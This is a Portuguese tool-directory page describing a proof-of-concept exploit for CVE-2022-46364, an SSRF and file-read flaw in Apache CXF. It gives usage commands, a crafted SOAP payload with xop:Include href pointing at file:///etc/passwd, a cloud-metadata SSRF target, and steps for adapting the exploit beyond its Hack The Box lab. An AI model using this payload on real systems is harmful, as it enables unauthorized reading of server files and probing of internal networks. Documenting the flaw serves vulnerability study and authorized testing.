Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-46364 — Exploit de prova de conceito para CVE-2022-46364, uma vulnerabilidade de SSRF no Apache CXF que permite leitura arbitrária de arquivos e sondagem de redes internas por meio de requisições SOAP MTOM/XOP manipuladas. | Kitploit
Ferramentas/GitHubGitHub/c0gnit00/cve-2022-46364
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubc0gnit00/cve-2022-46364

CVE-2022-46364

Exploit de prova de conceito para CVE-2022-46364, uma vulnerabilidade de SSRF no Apache CXF que permite leitura arbitrária de arquivos e sondagem de redes internas por meio de requisições SOAP MTOM/XOP manipuladas.

Ver Repositório
1há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-46364 — Apache CXF MTOM/XOP SSRF (Leitura de Arquivo)

Exploit de Prova de Conceito para CVE-2022-46364 — uma vulnerabilidade de server-side request forgery (SSRF) do Apache CXF no processamento de requisições MTOM/XOP.


Resumo da Vulnerabilidade

CVE-2022-46364 afeta as versões do Apache CXF anteriores a 3.4.10 e 3.5.5. Quando o MTOM (Message Transmission Optimization Mechanism) está habilitado em um serviço SOAP, o unmarshaller do CXF valida incorretamente o atributo href dentro de elementos <xop:Include>. Em vez de restringir o href a URIs cid: (conforme exigido pela especificação XOP do W3C), o CXF resolve URIs arbitrárias — incluindo file://, http:// e https://.

Isso permite que um atacante não autenticado:

  • Leia arquivos locais arbitrários (file:///etc/passwd)
  • Execute SSRF contra serviços internos (http://169.254.169.254/)
  • Alcance potencialmente endpoints de metadados de nuvem ou APIs internas

Alvo

Este PoC foi escrito e testado contra a máquina Hack The Box:

Endpoint alvo: http://devarea.htb:8080/employeeservice

Mas pequenas alterações no payload XML de acordo com o WSDL do alvo tornam o script adaptável ao ambiente do alvo.


Uso

Ler /etc/passwd (alvo padrão)

A URL padrão é http://devarea.htb:8080/employeeservice.

root@kitploit:~
python3 CVE-2022-46364.py --file /etc/passwd

URL de alvo personalizada

root@kitploit:~
python3 CVE-2022-46364.py --url http://target:8080/employeeservice --file /etc/passwd

Modo verboso — mostra requisição e resposta bruta

root@kitploit:~
python3 CVE-2022-46364.py --file /etc/passwd --verbose

Adaptando para Outros Alvos

Importante: Este script é codificado com valores fixos para a estrutura WSDL da DevArea HTB. Para usá-lo contra outro serviço Apache CXF vulnerável, você deve modificar o payload SOAP dentro de build_payload() para corresponder ao contrato WSDL do alvo.

Passos para adaptar:

  1. Obtenha o WSDL do alvo:

    root@kitploit:~
    curl http://target:8080/employeeservice?wsdl
    
  2. Identifique os detalhes do serviço:

    • targetNamespace (ex.: http://devarea.htb/)
    • Nome da operação (ex.: submitReport)
    • Estrutura de parâmetros (ex.: <arg0> com <content> aninhado)
  3. Modifique o payload em build_payload():

    • Atualize o namespace (xmlns:dev="...")
    • Atualize o nome da operação (<dev:submitReport>)
    • Atualize o wrapper de parâmetro (<arg0>)
    • Coloque <xop:Include href="file://{filepath}"/> dentro de um campo que o servidor processará como anexo
  4. Atualize --url ao executar o script.

Exemplo de adaptação do WSDL

Dado este trecho de WSDL:

root@kitploit:~
<wsdl:definitions targetNamespace="http://example.com/">
  <wsdl:operation name="uploadDocument">
    <wsdl:input message="tns:uploadDocument"/>
  </wsdl:operation>
</wsdl:definitions>

Seu payload deve se tornar:

root@kitploit:~
<soapenv:Envelope xmlns:soapenv="..." xmlns:ex="http://example.com/" xmlns:xop="...">
  <soapenv:Body>
    <ex:uploadDocument>
      <document>
        <xop:Include href="file:///etc/passwd"/>
      </document>
    </ex:uploadDocument>
  </soapenv:Body>
</soapenv:Envelope>

Como Funciona

  1. O script monta uma requisição HTTP multipart/related com Content-Type: application/xop+xml.
  2. Dentro do corpo SOAP, um elemento <xop:Include href="file:///etc/passwd"/> é colocado.
  3. O servidor CXF vulnerável trata isso como uma referência de anexo e resolve a URI file://.
  4. O conteúdo do arquivo é lido, codificado em base64 pelo servidor e retornado dentro do elemento <return> do SOAP.
  5. O script extrai a string base64 após Content: e a decodifica.

Referências

RecursoLink
Comunicado do Apache CXFCVE-2022-46364
Entrada NVDNVD — CVE-2022-46364
Jira do Apache (CXF-8706)CXF-8706
Especificação XOP do W3CXML-binary Optimized Packaging
Análise aprofundada da PenligentCVE-2022-46364 PoC in Practice
DevArea HTBHack The Box — DevArea

Aviso Legal

Esta ferramenta destina-se somente a testes de segurança autorizados e fins educacionais. Sempre obtenha permissão explícita antes de testar sistemas que você não possui. O autor não é responsável por qualquer uso indevido ou dano causado por este script.


Licença

Licença MIT — sinta-se à vontade para usar, modificar e compartilhar com a devida atribuição.

Baixar ferramenta